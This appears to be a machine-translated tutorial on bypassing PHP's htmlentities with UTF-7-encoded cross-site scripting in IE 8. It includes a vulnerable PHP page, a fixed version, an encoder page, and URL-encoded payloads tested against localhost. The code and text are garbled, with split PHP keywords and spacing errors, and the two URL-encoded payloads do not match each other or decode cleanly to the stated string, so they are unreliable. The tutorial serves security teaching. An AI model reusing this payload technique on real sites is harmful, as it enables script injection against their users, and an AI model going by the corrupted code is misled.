UTF-7 XSS Analysis

Test on: IE 8.0

Vul. php

<? Php
Header ('content-Type: text/html ');
$ String = $ _ GET ["note"];
Echo htmlentities ($ string); // use the htmlentities function to filter
?> Sec. php

<? Php
Header ('content-Type: text/html; charset = UTF-8 ');
$ String = $ _ GET ["note"];
Echo htmlentities ($ string );
?> Encode. php {The linefeed has been xxoo. Please add it yourself}

<? Php header ('content-Type: text/html; charset = UTF-8 ');?>
<Html>
<Head>
<Title> UTF-7 xss code Encoding </title>
</Head>
<Body>
<Center>
<Form action = "" method = "POST">
Xss code:
<Input type = "text" name = "code" value = "<script> alert ('90sec ') </script>"/>
<Input type = "submit" value = "Encoding">
</Form>

UTF-7 Bom:
+/V8 | +/v9 | +/v + | +/v/
XSS UTF-7 Encode:
<? Php $ encode = mb_convert_encoding ($ _ POST [code], 'utf-7');?> // Call the mb_convert_encoding () function for encryption
<? Php echo $ encode?>
</Center>
</Body>
</Html> vul. php differs from sec. php In charset settings. If charset is not set, it is vulnerable to attacks.

Because there is no encoding restriction, we can use another uncommon encoding (UTF-7) to escape xss detection.

Specific Method:

1. Use the encode. php file I wrote to encrypt the xss code.

Xss code: <script> alert ('90sec ') </script> www.2cto.com

UTF-7 XSS Encode: + ADw-script + AD4-alert ('90sec ') + ADw-/script + AD4-

2. Add the UTF-7 XSS Encode to the UTF-7 Bom to make it the code of the UTF-7

+/V8 + ADw-script + AD4-alert ('90sec ') + ADw-/script + AD4-

There is a space between Bom and Encode.

Other code may exist between bom and encode,

For example: +/v8 just for fun + ADw-script + AD4-alert ('90sec ') + ADw-/script + AD4-

3. If it is POST submission, you can directly submit the UTF-7 encoding characters

If the GET method is used, you must first perform URL transcoding for the encoded characters, because the browser will swallow the plus sign, and I have stopped here for a long time.

+/V8 + ADw-script + AD4-alert ('90sec ') + ADw-/script + AD4-URL code

% 2B % 2F % 76% 38% 20% 2B % 41% 44% 2D % 77% 73% 63% 72% 69% 70% 2B % 74% 41% 2D % 44% 6C % 34% 61% 65% 72% 74% 28% 27% 39% 30% 73% 65% 63% 27% 29% 2B % 41% 44% 2D % 2F % 77% 73% 63% 72% 69% 2B % 70% 74% 2D

Test vul. php:

Http: // 127.0.0.1/learn/vul. php? Note = % 2B % 2F % 76% 38% 20% 2B % 41% 44% 2D % 77% 73% 63% 72% 69% 2B % 70% 74% 2D % 41% 6C % 44% 34% 61% 65% 72% 74% 28% 27% 39% 73% 65% 63% 27% 29% 2B % 41% 44% 2D % 2F % 77% 73% 63% 72% 69% 2B % 70% 74% 2D

:

 

Related information:

Http://shiflett.org/blog/2005/dec/google-xss-example

Http://shiflett.org/blog/2005/dec/googles-xss-vulnerability

Http://zh.wikipedia.org/zh-cn/UTF-7

PS: I am not necessarily correct. Please correct the mistake. Thank you.